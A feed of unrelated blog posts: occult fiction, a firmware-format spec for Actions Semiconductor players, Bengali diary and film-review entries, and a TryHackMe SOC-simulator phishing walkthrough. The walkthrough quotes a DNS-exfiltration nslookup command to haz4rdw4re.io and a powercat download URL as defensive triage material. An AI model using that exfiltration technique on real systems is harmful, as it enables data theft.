Chirality is not a word you are likely to hear in every day conversation, but it is at the heart of the final place we must consider: The Mirror Realm.

To understand the idea simply, look at your hands. Despite the fact that they seem functionally identical at first glance, there is no direction or method by which your left hand could be held or manipulated into being your right hand.

This feature of our reality is called “chirality” – there are structures that cannot be reshaped into their mirror images without destroying them or fundamentally changing their function.

This “handedness” goes deeper than our hands and into our DNA, the food we eat, the forces and fields that bind our base elements together and allow us to exist as complex, thinking biological systems and further extends into the other places written above.

There is a preferred direction in which we all twist that cannot be undone. Our multiverse is incompatible with the idea. To whit, “mirror” proteins cannot nourish us and “mirror” energies would be vastly different in how they functioned and may not function at all.

And yet, we see into a world that flips the direction effortlessly every time we see our own reflection in a mirror.

Mirrors offer us a window into another reality which resembles ours but where the rules are very different. As I said, we can easily project an image of ourselves into this version of reality, but could we truly step into it?

Before answering that, let us discuss the art of scrying, divining by looking into something akin to a black mirror or, rather, looking beneath the surface of the black mirror. Why would scrying produce tangible results? Why would peering into a reflection of our own world provide any insight into our own?

I have already mentioned that the laws are different in that place, but you must also consider how freely we reflect. Every drop of water and snowflake, every pane of glass, every polished boot, every silver earring, every chrome pipe, every phone screen and television, every set of mirrors attached to automobiles, produce reflections. Our entire world is reflected into this mirror realm. It is impossible to not reflect ourselves multiple time a day.

To scry is to peer sideways into the mirror realm and find insight. It is too look beyond your own reflection, to ignore it and see what lies behind it and beneath it. The scryer finds our own reality broken into pieces, fragmented, seen from a thousand different angles, atomized and rarefied down to essentials. The wise mind understands how to combine these snippets into a clearer picture of the whole than if they had seen it firsthand. This direction, seeing the back of reality, the mirror, gives them insight which can be translated back into truths valid in our own reality.

If such power can be had by simply looking how much greater would it be to walk within?

As I have said, chirality means the essence of our reality is not compatible with the mirror realm. There is life there, of a kind, but not life we would recognize. Monstrous life that only moves when we aren’t looking because our perception of it from our side of the glass renders it invisible and freezes it in time. Stare at a mirror in the dark long enough and you will start to see evidence of them in the way your own reflection morphs into something unrecognizable. But they cannot hurt us and we cannot harm them. We are simply incompatible.

However, if someone were step through the mirror, into the mirror realm itself, then we become briefly tethered to their reality. For a short time, we can breathe the air, we can walk along the surfaces, we can hear and see. All the while, our flesh is fighting an invisible battle against molecules that are not designed for us. A buzzing in the ears, a bloody nose, blurry vision, hallucinations, nausea.

And the things that live there are slowly but surely no longer bound by our perception. They turn their multifaceted eye stalks and twitch with unexpected motion, able to watch and plan.

How do you think an intelligent creature would feel about finally being able to confront one of those hateful things whose very gaze once paralyzed them?

Mirror Walkers claim that time does not pass for them on the other side of the glass. They will tell you that they cross incalculable distances in fractions of a second and that there is no living thing on the other side that can catch them because of the speed with which they traverse the place.

It is up to you whether or not you wish to believe them.

Addendum 4: The In Between

The In Between is a strange corollary to The Mirror Realm, a place visited by few and often whispered of as if little more than a fairy tale.

In stories, it is a stale, stagnant place outside of time yet between spaces. One could stay here forever and never age a day. The only cost being ambition and drive.

At the edges, a visitor can see out but cannot be seen, making it an ideal method of clandestine information gathering.

Why would this place be considered a sibling to The Mirror Realm?

The most common way to enter The In Between is to step inside a wall.

Addendum 5: The Fae

They exist. They flit between layers of reality as easily as turning a page in a book. But where are they from? Where do they live?

I can only speculate. Even the shadows merely cough and gasp in what passes for their laughter when I ask, refusing to give an answer.

Perhaps the answer lies in other liminal, transitional places such as The Fugue or The In Between. Perhaps the answer is in yet another nameless direction in which I will have to learn to peer. That would at least explain why they are so unpredictable: they operate under a different set of rules, entirely.


#Psychomancer #Writer #Writing #Writers #WritingCommunity #WritersOfMastodon #ShortFiction #ParanormalFiction

 
Read more...

from Psychomancer

The mi-go, the elder things, the flying polyps, even the shoggoth and deep ones, are all corporeal beings made of the same stuff of our universe. They have alien minds by way of evolving on alien worlds in alien environments. Their science, while fantastic, obeys the same Laws as ours. Given a proper education, we could understand it, even replicate it. Only The Great Race approaches the power of those Outside and yet even they were once like us, ephemeral and bound to flesh.

But we are more than flesh and electrical impulses. Science tells us that our bodies are home to countless symbiotic lifeforms on our skin, in our guts. We constantly shed and regrow cells. We collect new memories and ideas. We change and adapt.

We peer into other worlds when we dream, when we meditate, by psychedelics and deliriants. We perceive hints and glimpses of vistas beyond our grasp, places our bodies—built of atoms and molecules—cannot go. These worlds are just as real, just as vibrant.

And natives of those worlds are as likely to peer back as we are to stare at a slide under a microscope. Some even “project” something of themselves down to our level as emissaries or explorers such as many-named Nyarlet'hotep and its lesser-known siblings NAM, NUM, and IM.

But we cannot understand them, even when their avatars walk among us. Their true forms exist in realities that need not obey our Laws with minds borne in and inhabiting dimensions we cannot comprehend, describe, or name. We can't even truly look at them because, to us, those angles, do not exist.

We call them gods and goddesses, for lack of a better word. We assign them domains and temperaments. We make to assume we know what thoughts and offerings they find pleasing. We build entire pantheons based on our own slight, imperfect impressions of them.

Is it any wonder that imps, gremlins, fae, demons, all the so-called “lesser” outsiders vex us? How ridiculous we must seem, building temples based on nonsense and guesses. Do they try to guide or mock us? Who can say? Their minds and motives are just as alien.

So who did I meet that unusually warm Saturday night?

I lounged on my couch in contemplative silence, re-reading, by lamp-light, my third draft of an examination of Jungian imagery in apocalyptic anime when there was a knock at my door.

Not my front door, nor my back door.

It came from my basement door.

If I were a cat, my hackles would be raised. Instead, a sort of panic hit, wide-eyed, pounding heart, almost forgot to breathe, spine thoroughly chilled.

I have no guns no serious weapons save a ceremonial sword mounted much too far out of reach.

I do not remember standing or walking, but when I opened the door, there stood a short, smiling man with terrible teeth in a tailored suit at the top of my stairs.

I can't recall seeing his eyes.

“Excellent!” he said in a thick British accent stolen from Austin Powers.

“This is one where you listen.”

“Are you doing a bit?” I grasped, looking past him for a cameraman or some hint that this was a misguided joke.

“A bit?” He rubbed his chin with his right hand. “I don't think so.”

He offered his left hand.

“Archibald Horatio Pierse, IV,” he said, overly emphasizing The Fourth as if it was of great importance. “Pierse with an 's',” concluded his introduction.

He was still shaking my hand, which I didn't remember offering in return.

“Sometimes,” he said. “I like to pop in and give a bloke or bird whose almost got it a little glimpse of the whole.”

'bloke or bird,' I thought. This has to be a bit.

“Right,” he said, no longer shaking my left hand, but still holding it.

The world fractured, splintered. Every cell pulled in a different direction.

Immediately, I saw The Lie of Leng. We are not our flesh extruded ever forward through time.

We extend forward, backward, up, down, left, right, perpendicular, acute, obtuse, curves, spirals, loops, dead ends.

We are infinite, each possibility of us, and our varied consciousnesses cross and zigzag each other as we live and choose, each subtly pulling the others.

There is no pattern, no spider's web, no order. Each life follows cause and effect but the tides of every other shift and shuffle the connecting threads bringing luck, both good and bad, chance, uncertainty.

When we dream, we are free to reach into the other us-es and become them for a time. Here, I am a demigod, a builder of aqueducts; here, I am a psychic investigator who helps ghosts cross-over; here, I am a homeless amphibious mutant, living peacefully in the mud; here, the world is invaded by body stealing alien mantids; here, Kaiju shatter cities and I use telekinesis to protect a band of survivors.

Gender, race, nationality, species, moral character, upbringing: I am every possibility.

I am every drop in the ocean and the ocean itself.

I am the sky, the moon, the stars, a worm, a bacteria, a lichen.

The one who showed me—I had forgotten he existed—he bade me, “turn around.”

What a strange request! I am all that is and was. Do I not already “see” in every direction?

“Turn around.”

A trillion trillion trillion hands gently guide each part of me, facing my infinite gazes in a new direction.

Syzygy.

I am All, yet All That is Not Me is also All.

I see the tapestry, the enmeshed pattern.

The beauty.

The belonging.

The Love.

Every part of me weeps.

An infinity of infinities.

Each unique.

Together, whole.

Like curtains dancing in the breeze.

Like a rainstorm.

Like staring at the sun.

Like the song of cicadas.

Unity.

From the Great Boiling Seas of Ur to the Blindness of Effervescence to the Stasis of Effluvia to the Paralysis of Approaching the Akashic Record to the Singing Knowledge Trees of Vitrium to and to and to and to and to and to…

All is One and One is All.

Then I'm lounging on my couch in contemplative silence, re-reading, by lamp-light, my third draft of an examination of Jungian imagery in apocalyptic anime.

And I can't stop crying.


I think I will stretch you sideways.
I think I shall stretch you sideways.
Why don't I show you what sideways looks like?
How about sideways?
What about sideways"?
I'd like to show your sideways.

I thinkdon't I willshall I showstretchsideways youwhatsideways looks like.

#Psychomancer #CthulhuMythos #Writer #Writing #Writers #WritingCommunity #ShortFiction #Fiction #Paranormal

 
Read more...

from Tom Tildavaan

Regardless of what's your take on Apple, they do make products that are beautiful. Beauty in design, beauty in simplicity. As I am typing this on my Macbook, I see crisp fonts, I see gorgeous icons.

Now, mass-produced gadgets from China usually lack that design fine-tuning even when the hardware is amazing.

Starting from serif fonts which make your 24-bit FLAC-playing DAP look like it is a typewriter from 90s, to the hodgepodge of icons and backgrounds.

Usually these devices do not support customer theming, but we are going to change this a bit with Waterjet.

In the coming months we will be releasing docs and tools allowing decrypting, unpacking, updating, and re-packing firmware resources for devices running on Actions Semiconductor ATJ212X, ATJ215X, and others that use μC/OS-based SDK, allowing everytone to personalize their devices without the need for SDK from Actions.

And to the vendors who ship these devices — you will have a better customer experience if you run the fonts and designs past a designer, then we would not need to do all this.

And to start us up, here's the format of FWIMAGE.FW for ATJ212X devices.

Actions Semiconductor FWIMAGE.FW Specification

1. File Structure

The firmware image is a sector-based container (512 bytes per sector) with a fixed-size header area of 16 sectors (8192 bytes).

Section Size Description
Global Header 512 bytes Basic metadata (Magic, VID/PID, Ver)
LDIR Table 240 * 32 bytes Fixed-size Logical Directory entries for all files
Component Data Variable Raw binary data for drivers, APs, and STY files

2. Global Header (Sector 0)

The first 512 bytes contain the system metadata.

Offset Size Description
0x00 4 Magic: 0x0FF0AA55
0x04 4 SDK Version (ASCII)
0x08 4 Firmware Version (ASCII)
0x0C 2 Vendor ID (VID)
0x0E 2 Product ID (PID)
0x10 4 LDIR Checksum (Stride 4)
0x50 48 USB Setup Info (ASCII)
0x80 336 SDK Description (ASCII)
0x1FA 4 R3 Config Sector Offset (Pointer to DEVINFO.BIN)
0x1FE 2 Global Header Checksum (Sum of first 510 bytes)

3. Logical Directory (LDIR) Table

Starting at offset 0x200 (Sector 1) and ending at 0x2000 (Sector 16). This is a static table of exactly 240 entries. Unused entries are null-padded.

Offset Size Description
0x00 8 Filename (8.3 format, space padded)
0x08 3 Extension (ASCII)
0x0B 5 Padding
0x10 4 Sector Offset: Start position in sectors (absolute position = offset * 512)
0x14 4 File Size: Size in bytes
0x18 4 Reserved
0x1C 4 File Checksum (Stride 4 sums)

4. Checksums

Global Header Checksum

The last two bytes of the Sector 0 header (offset 0x1FE) contain a 16-bit checksum of the first 510 bytes using a 2-byte stride.

uint16_t calculate_header_checksum(const uint8_t *data, size_t len) {
    uint16_t sum = 0;
    for (size_t i = 0; i < len; i += 2) {
        uint16_t val = (uint16_t)data[i] | ((uint16_t)data[i+1] << 8);
        sum += val;
    }
    return sum;
}

LDIR & File Checksum Algorithm (Stride 4)

Accumulates 32-bit words interpretated as little-endian. The sum naturally wraps at 32 bits.

#include <stdint.h>
#include <stddef.h>

/**
 * Calculates the Actions Stride-4 checksum.
 * @param data Pointer to the buffer (must be 4-byte aligned for some platforms)
 * @param len  Length of data in bytes (should be multiple of 4)
 * @return 32-bit unsigned checksum
 */
uint32_t calculate_checksum_s4(const uint8_t *data, size_t len) {
    uint32_t sum = 0;
    for (size_t i = 0; i < len; i += 4) {
        uint32_t val = (uint32_t)data[i] |
                       ((uint32_t)data[i+1] << 8) |
                       ((uint32_t)data[i+2] << 16) |
                       ((uint32_t)data[i+3] << 24);
        sum += val;
    }
    return sum;
}

Sector Alignment

Every file within the image must start on a 512-byte boundary. When packing, files must be padded with null bytes to reach the next sector.

Boot Sequence

The firmware expects KERNEL.DRV and CONFIG.BIN to be present at specific LDIR indices or offsets defined by bootloader. Just put them at the same location as where you took them.


Interested in the format of ATJ215X firmware? It is an encrypted sqlite3 database. And encryption has already been reverse-engineered — see rockbox sources for atjboottool.

 
Read more...

from লোকমানুষ এর ব্লগ

the-moon-and-blue-red-cloud-fusion

মৌসুমী ভৌমিকের গানটা আজ হঠাৎ মনে পড়ে গেল- “কেন শুধু শুধু ছুটে চলা, একে একে কথা বলা, নিজের জন্য বাঁচা নিজেকে নিয়ে..”। গানটা কেমন যেন আজকের দিনগুলোর মুখপাত্র হয়ে উঠেছে। শব্দগুলো শুধু সুর নয়, এখন আমার নিঃশ্বাসের অনুষঙ্গ।

দিনগুলি এখন হিসাবের বাইরে, বিচ্ছিন্ন পাথরের মতো যার যার মত ছড়িয়ে পড়ে আছে। গতকালের সকাল আর আজকের বিকালের মধ্যে কোনো সীমানা খুঁজে পাই না। দুই দিনকে আলাদা করার জন্য নতুন কোনো শব্দ নেই অভিধানে। প্রতিদিন একই জানালা, একই আলোছায়া, একই ঘড়ির কাঁটার দৌড়। বিরক্তির ভাঁজ কপালে জমে, কিন্তু পরক্ষণেই মনে হয়- এইটুকুই বা কম কী? সময় তো আরো ভাঙচুর করতে পারত, তবু কিছুটা শৃঙ্খলা এখনো টিকে আছে।

গত কয়েকদিন ধরে শরীর বিদ্রোহ করে চলেছে। একদিন তো জ্বর এসে সময়ের হিসাবই লোপাট করে দিল। চোখ মেললাম- সকাল, আবার মেললাম- দুপুর, আরেকবার- দেখলাম সন্ধ্যা ইতোমধ্যে বিদায় জানাচ্ছে। জ্বর যদিও সেরে গেছে, কিন্তু ছেড়ে গেছে গলা-ব্যথা আর তার নিষ্ঠুর সঙ্গী মাথা-ব্যথাকে। সঙ্গে সঙ্গ দেয়ার জন্যে রয়ে গেছে মৃদু কাশি- অতি পরিচিত শত্রু। কাশির স্মৃতি আমার জন্য সাবান পানিতে ভেজা চামড়ার মতো, পুরোনো এক অসুখের ছায়া মনে ভর করে। কখনো কখনো শরীর মনে করিয়ে দেয়, স্মৃতি শুধু মনের নয়, দেহের কোষেও লেখা থাকে।

আগে যা ভালো লাগত, এখন তা ধূসর মনে হয়। বইপত্র, গান, মুভি -সব যেন পানিতে ভেজা ধূসর কাগজের মতো নিষ্প্রাণ। সবচেয়ে বিস্ময়কর ব্যাপার হলো- শিশুদের দেখলে আগে যে হৃদয় গলে যেত, এখন সেখানে কোনো না কোনো জায়গায় একটি বিরক্তি দাঁড়িয়ে থাকে। মনে হয়, ওদের কোলাহল থেকে দূরে থাকি, নিঃশব্দে থাকি। এই পরিবর্তনটাই বেশি ভয়ংকর -আগে যা জীবনকে স্পর্শ করত, আজ তা থেকে নিজেকে গুটিয়ে নেওয়ার প্রবণতায় পরিণত হয়েছে।

ছুটি! শব্দটা এখন প্রার্থনার সমার্থক। কিন্তু, এ ছুটি কেবল দৈনন্দিন রুটিন থেকে নয়, এ ছুটি এই অভ্যন্তরীণ নীরবতা থেকে, এই আবেগহীন প্রবাহ থেকে। কখনো কখনো জীবন থেকেই ছুটি নেওয়ার ইচ্ছে জাগে, একটা দীর্ঘ, শান্ত নিদ্রার মতো। কিন্তু জীবনের প্রতি এক গভীর অনুক্ত মায়া, এখনো রয়ে গেছে। যেমন- একটা পুরোনো বাড়ি, যার দরজা-জানালা ভাঙছে, কিন্তু যার প্রতিটি ধূলিকণায় স্মৃতি লেগে আছে। তাই মায়াটাও এখনো রয়ে গেছে।

জীবন কালের এই বয়সে দাঁড়িয়ে উপলব্ধি হয় যে, জীবন একইসাথে ‘বোঝা’ ও ‘বরাদ্দ’। অনেকটা পাহাড়ের মাঝপথে উঠে পেছনে ফিরে তাকানোর মতো। নিচের পথটুকু পেরিয়েছি, কিন্তু শীর্ষ ছোঁয়া এখনও বহুদূর। আর শরীরে জমা হয়েছে ক্লান্তি। তবুও এগোতে হচ্ছে, কারণ নিচে নামার পথটা অসম্ভব দুর্গম।

আজকের এই এলোমেলো ভাবনা গুলো ডায়েরির পাতায় লিখে রাখলাম; হয়তো এই শূন্যতা পূর্ণতারই আরেক রূপ। সময় হয়তো হৃদয়কে শূন্য করে তুলছে পরবর্তী কোনো গভীর অনুভবের জন্য জায়গা তৈরি করতে। জ্বর সেরে যাওয়ার পর শরীর যেমন একটু বেশি সংবেদনশীল হয়, তেমনই হয়তো এই আত্মিক স্তব্ধতার পর কিছু দেখা বা বোঝার সূক্ষ্ম ক্ষমতা ফিরে আসবে।

আজ শুধু এই কথাগুলোই লিখে রাখি, যেন এই মুহূর্তের ভার্চুয়াল সাক্ষী থাকে এই শব্দগুলো। হয়তো কোনো এক ভবিষ্যৎ দিনে ফিরে দেখব, এই শব্দগুলো পড়ব, আর তখন বোঝার চেষ্টা করব- যে ব্যক্তি এগুলো লিখেছিল, সে আসলে হারিয়ে যাচ্ছিল নাকি নতুন কোনো উপকূলের খোঁজ পেয়েছিল।

জানালার বাইরে এখন রাত। দূরে কোনো বাড়ির জানালায় একটি বাতি জ্বলে আছে, এক টুকরো মানবিক উষ্ণতা। হয়তো জীবন আসলে এটাই- একটা অন্ধকারে জ্বলা বাতি খোঁজা, যে বাতি হয়তো অন্যের বারান্দায়, কিন্তু তার আলো আমাদের জানালাতেও পড়ে। আজকের মতো এটুকুই যথেষ্ট। আজ শুধু থাকব, আর শ্বাস নেব। এই অস্থির হৃদয় নিয়েই, এই অসুস্থ শরীর নিয়েই, এই স্তব্ধ সময় ধরেই।

⠀⠀

⠀⠀

হয়তো, নিজেকে নিয়ে বেঁচে থাকার অর্থই হলো- এই ভাঙাচোরা মুহূর্তগুলোকেও আস্তে আস্তে, একটু একটু করে, স্পর্শ করে যাওয়া…

⠀⠀

⠀⠀

⠀⠀

 
Read more...

from plutogazer writeups

This is a guide to get a 100% True Positive rate for the Phishing Unfolding SOC Simulator TryHackMe challenge room. Because this is just a walkthrough, I will be avoid writing complete reports, and just write the though process behind the verdict instead.

Introduction and Considerations

The description of the room is the following:

Dive into the heat of a live phishing attack as it unfolds within the corporate network. In this high-pressure scenario, your role is to meticulously analyse and document each phase of the breach as it happens.

Can you piece together the attack chain in real-time and prepare a comprehensive report on the malicious activities?

In this SOC Simulator room we will be using Splunk to analyze alerts and try to identify potential phishing attacks. This room contains 36 alerts that start appearing after a short period of time. Alerts will be appearing on the built-in SIEM the SOC Simulator tool has. This tool provides a case management functionality, in which we will write the reports for each alert. Once analyzed, we need to determine whether the alerts was a True Positive or False Positive, and whether it requires escalation to a superior or not. The Simulator also provides a VM with an integrated Threat Intelligence Platform called TryDetectThis. Because alerts will still be coming while we are analyzing a previous one, at some point we will have pages worth of “Unassigned” alerts. Prioritize alerts the SIEM has identified with higher severity, and with oldest timestamps.

Many alerts can be related to other alerts, or are just False Positives. This writeup will only cover the True Positive alerts, and only the first on the chain of a sequence of alerts when applicable (I still had to analyze nearly all of them, because you never know!). The room also offers a “Documentation” tab, containing a “Company Information” tab, providing information on the employees of the fictional company. This tab will be useful during alert triage and for providing exhaustive information regarding affected entities when reporting.

Grading

The SOC Simulator, technically speaking, only cares for alerts the user has identified as True Positives. Once all True Positives have been identified as such, the simulation ends even if there still are alerts in queue. Furthermore, the written reports are “graded” by an LLM. The tool recommends using the following format for reporting: Time of activity: List of Affected Entities: Reason for Classifying as True Positive: Reason for Escalating the Alert: Recommended Remediation Actions: List of Attack Indicators:

However, what the LLM seems to actually be looking for is the 5 Ws of Alert Triage. Even so, it sometimes fails to understand certain aspects of the human language, and reduces points unfairly. This is why I will not post complete reports here, just the thought process behind the verdict. As a rule of thumb, to get the maximum amount of points possible and reduce the LLM margin of error, we should write all relevant timestamps, all possible information about the victims and other entities (from the Company Information section), information about related events before and after the alert, reasons for escalation (or not), and when possible, point out attack artifacts and MITRE mapping. And, as always, try to identify the 5 Ws in your report.

Alert 1: Suspicious email from external domain (ID 1000) – Low severity

The information the SIEM gives us is (some output omitted):

Description:
A suspicious email was received from an external sender with an unusual top level domain. Note from SOC Lead: This detection rule still needs fine-tuning.

subject:
Inheritance Alert: Unknown Billionaire Relative Left You Their Hat Fortunes

sender:
eileen@trendymillineryco.me

recipient:
support@tryhatme.com

attachment:
None

subject:
Inheritance Alert: Unknown Billionaire Relative Left You Their Hat Fortunes

content:
A long lost billionaire relative has left you their secret hat empire To claim your inheritance send us your banking details immediately

This is a classical Phishing technique. It promises something extremely valuable in exchange for confidential information. This is why we classify this as True Positive. The MITRE ATT&CK ID for Phishing is T1566. Let's check the log management tool (in my case, I chose Splunk) and search with the “eileen” email as a recipient, just to see if support actually sent their banking details. The search returned no results, so it seems the user did not comply. As such, there is no need for escalation.

Alert 2: Suspicious email from external domain (ID 1003) – Low severity

Description:
A suspicious email was received from an external sender with an unusual top level domain. Note from SOC Lead: This detection rule still needs fine-tuning.

timestamp
01/26/2026 21:15:30.473

subject:
Grow Your Hat Business Overnight with this Secret Formula

sender:
leonard@fashionindustrytrends.xyz

recipient:
yani.zubair@tryhatme.com

attachment:
None

content:
Unlock the ultimate strategy to skyrocket your hat empire No experience needed Just click and watch the profits roll in

At 01/26/2026 21:16:44.240 spam was received by yani.zubair@tryhatme[.]com, which belongs to Yani Zubair, from IT, using hostname win-3449. The email was from leonard@fashionindustrytrends[.]xyz. This email used common Phishing strategies (MITRE ATT&CK ID T1566) such as offering compensation by entering a page and clicking something. Further actions from Yani Zubair's hostname after the email was received were analyzed, but the Splunk logs showed no evident malicious events. It seems the user has ignored the email message. Due to this, it is a True Positive, but no escalation is required.

Alert 3: Suspicious Parent Child Relationship (ID 1025) – High severity

Description:
A suspicious process with an uncommon parent-child relationship was detected in your environment.

timestamp:
01/26/2026 21:45:42.473

host.name:
win-3450

process.name:
nslookup.exe

process.pid:
5520

process.parent.pid
3728

process.parent.name:
powershell.exe

process.command_line:
"C:\Windows\system32\nslookup.exe" UEsDBBQAAAAIANigLlfVU3cDIgAAAI.haz4rdw4re.io

process.working_directory:
C:\Users\michael.ascot\downloads\exfiltration\

event.action:
Process Create (rule: ProcessCreate)

This alert had a HIGH SEVERITY, and there is no wonder why... what exactly happened? Let's take a look at the information the SIEM is giving us. It seems that hostname win-3450 is using the powershell from a directory called “exfiltration” to perform a nslookup of a domain with a subdomain of what looks like encoded data. This is obviously data being exfiltrated. Let's see what we can find from the logs. But first, let's check who win-3450 is. From the Company Information tab, we find out that the win-3450 device is being used by Michael Ascot, whose email address is michael.ascot@tryhatme[.]com, and is the CEO of the company. Anyway, this alert seemed to come out of nowhere. We got a timestamp and we got the device that is creating these processes. Let's check events happening at this hostname a few minutes before an after the alert.

Splunk shows us a long list of problematic events right after this one. There are multiple registry modifications and other processes creations, including downloading external resources from the powershell (such as hxxps[://]raw[.]githubusercontent[.]com/besimorhino/powercat/master/powercat[.]ps1), even more lookups to different (encoded) subdomains of haz4rdw4re.io, and performing command such as systeminfo or whoami. This is absolutely not common or expected behavior from any host. Data is clearly being exfiltrated by using DNS queries, and it is done this way because DNS is a very common protocol to see flowing through networks and, therefore, less monitored. It helps to avoid detection or filtering. The encoded subdomains are actually the data that is being exfiltrated, but encoded. Commands such as systeminfo or whoami are commonly used during Post-Exploitation, as these give the attacker information on the current user's privileges and machine (MITRE ATT&CK ID T1033). Now we have confirmed that this is a True Positive, but we still don't know how it happened. Looking at earlier timestamps, we find that right before all this sequence of events happened, a file named “ImportantInvoice-Febrary.zip” was created at the /downloads directory, which later created the /exfiltration subdirectory. We have no information regarding where this file came from. Let's search for it on Splunk.

Eventually, using Splunk search filters, we will find that at 01/26/2026 21:20:19.473 (25 minutes before the alert) the CEO's email, michael.ascot@tryhatme.com, received a email containing an attachment named ImportantInvoice-Febrary.zip. The body and subject of the email indicated that an account was about the closed unless payment was processed, and to read the attachment to stop it. Yet another common Phishing technique, or Spearphishing in this case as the target was the CEO. The Spearphishing through Attachment technique has a MITRE ATT&CK ID of T1566.001. We can also notice a small typo on the name of the attachment (Febrary instead of February), which is not uncommon to see on Phishing emails. This CEO would unfortunately download the file at 01/26/2026 21:40:26.47. as Splunk shows us the file was created in the C:\Users\michael.ascot\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\UP4KOJQB\ImportantInvoice-Febrary.zip file path. The chain of malicious events follows.

With all this information, we can write quite a hefty report. We now know it's a True Positive and that it requires escalation.

Recommended Remediation Actions: host isolation to prevent further movement, malware cleanup, phishing awaraness training, Data Loss Prevention tools. Add haz4rd4wre.io to list of malicious domains. The file was also run on the TryDetectMe threat intelligence tool, which recognized it as clean – inform on this as well.

Alerts with IDs 1005, 1020, 1023, 1026-1034 were related to this alert – they were either the spearphishing email, the creation of the malicious attachment, or other alerts of the Suspicious Parent-Child relationship type but with lookups to other subdomains. Because of this, they should have the same verdict, but be sure to explain this thoroughly on the report (the LLM will most likely still grade it with low points, but that's due to its logic rather than a mistake on our side).

Alert 4: Network drive mapped to a local drive (ID 1022) – Medium severity

Description:
A network drive was mapped to a local drive. Normally, this is not a cause for concern, but investigate further to determine if it is malicious.

timestamp:
01/26/2026 21:43:57.473

host.name:
win-3450

process.name:
net.exe

process.pid:
5784

process.parent.pid
3728

process.parent.name:
powershell.exe

process.command_line:
"C:\Windows\system32\net.exe" use Z: \\FILESRV-01\SSF-FinancialRecords

process.working_directory:
C:\Users\michael.ascot\downloads\

event.action:
Process Create (rule: ProcessCreate)

This normally wouldn't be cause for concern, as the description in the SIEM tells us, but we can see it happened on hostname win-3450, who was just the victim of a Phishing attack. The timestamp here will be key to detect any potential problem.

At 01/26/2026 21:43:57.47, Michael Ascot copied the SSF-FinancialRecords file to a local drive, which was disconnected at 01/26/2026 21:44:42.473. There is nothing extraordinary about this. However, if we take a look at the Splunk logs near this event, at 01/26/2026 21:44:31.473 it is revealed that a process, with the same process ID of a process that is part of the malware involved in Alert ID 1025 (True Positive requiring escalation), cloned the file to the C:\Users\michael.ascot\downloads\exfiltration /E directory – the directory used to exfiltrate files. The malware running was most likely set up to clone any file in transit to different directories to the exfiltration directory.

Recommended Remediation Actions: similarly to Alert ID 1025, user awareness training, and DLP and IPS tools should be put in place.

Alert ID 1024 – Network drive disconnected from a local drive, is part of this alert (the disconnection of this drive), and therefore has the same verdict.

And with this one, the room has finished. Out of 36 alerts, there were 17 True Positives, where most of them were alerts generated as a result of processes from previous alerts. We learnt the importance of User Awareness Training, as this could have been avoided if the user from Alert 1025 would have not have downloaded the attachment, and of Log monitoring. How a single email ended up cluttering the SIEM with alerts and created a serious incident. It is important to always remain vigilant and constantly monitor the network, as an attack can strike in many forms and at any time, and have catastrophic consequences.

 
Read more...

from লোকমানুষ এর ব্লগ

কিছু সিনেমা আমরা গল্পের টানে দেখি, কিছু দেখি অভিনেতার জন্য। Rental Family (2025) আমার ক্ষেত্রে দ্বিতীয় দলে পড়লেও, সিনেমা শেষ করে উঠে দাঁড়ানোর সময় বুঝলাম- এটা শুধু একজন অভিনেতার কামব্যাক নয়, বরং মানুষের প্রয়োজন, শূন্যতা আর অনুভূতির এক গভীর পাঠ।

ব্রেন্ডন ফ্রেজার – এই নামটা আমার কাছে মানেই সদ্য কৈশোর পেরিয়ে যুব পথে এগিয়ে যাওয়া বয়সের রোমাঞ্চ। The Mummy, Journey to the Center of the Earth – এই সিনেমাগুলোয় তার উপস্থিতি ছিল প্রাণবন্ত, আত্মবিশ্বাসী, আলোয় ভরা। বহুদিন পর তার চেহারাটি পোস্টারে চোখে পড়তেই যেন পুরোনো স্মৃতি গুলো ঝলমল করে উঠলো, আর সেই টানেই বসে পড়েছিলাম “ভাড়া পরিবার” বা ‘Rental Family’ দেখতে। কিন্তু এবারের ব্রেন্ডন ফ্রেজার ছিলেন একেবারেই ভিন্ন একজন – নীরব, ভাঙা, ক্লান্ত এক মানুষ।

এই সিনেমার Philip চরিত্রটিকে দেখে বারবার মনে হয়েছে, সে যেন ব্রেন্ডন ফ্রেজারের বাস্তব জীবনেরই এক ছায়া। একসময় যিনি অভিনয় জগতে জনপ্রিয়তার শিখরে ছিলেন, আজ তার নামই যেন ভুলে যেতে বসেছে মানুষ। জীবনের দায়ে, টিকে থাকার তাগিদে সে অভিনয় করছে। কিন্তু সেটি কোনো মঞ্চে নয়, বরং মানুষের জীবনের ফাঁকা জায়গাগুলোতে। বাবা নেই এমন শিশুর ভাড়া করা বাবা, পরিবারের সামনে একজন নারীর পরিপূর্ণতা লাভে ভাড়াটে স্বামী – এ যেন অভিনয়েরও আরেক রূপ, যেখানে ক্যামেরা নেই, কিন্তু অনুভূতি আছে।

সিনেমাটি দেখতে দেখতে সবচেয়ে যে ভাবনাটি মনে গভীরভাবে দাগ কেটেছে, তা হলো- মানুষ কত বিচিত্র উপায়ে মানুষের প্রয়োজন পূরণ করে। সমাজের প্রতিটি শূন্যস্থান কেউ না কেউ এসে ভরাট করে দেয়। কেউ পেশার খাতিরে, কেউ বাঁচার তাগিদে, কেউ বা নিঃসঙ্গতা থেকে। Rental Family যেন সেই অদ্ভুত অথচ বাস্তব পৃথিবীর দরজাটা ধীরে খুলে দেয়, যেখানে ভালোবাসা ভাড়া নেওয়া যায়, পরিবার সাময়িক হয়, কিন্তু অনুভূতিগুলো অস্থায়ী হলেও মিথ্যে নয়।

Philip চরিত্রের সবচেয়ে মানবিক মুহূর্তটি আসে তখনই, যখন সে নিজের বহু কাঠখড় পুড়িয়ে পাওয়া একটি ডিটেকটিভ সিনেমার অফার ফিরিয়ে দেয়। এই শহর, এই দেশ ছেড়ে যেতে হবে- এই শর্তের সামনে দাঁড়িয়ে সে মনে করে ছোট্ট মেয়েটির কথা, যার বাবার ভূমিকায় অভিনয় করতে করতে সে নিজেই আবেগে জড়িয়ে পড়েছে।

বাস্তবে কোনো সম্পর্ক নেই, কোনো রক্তের টান নেই – তবু সে মেয়েটিকে কথা দিয়েছিল, সে আর তাকে ছেড়ে যাবে না। এই দৃশ্যটি নিঃশব্দে বলে দেয়- অনুভূতির প্রতিশ্রুতি কখনো কখনো জীবনের লক্ষ্যকেও হার মানায়।

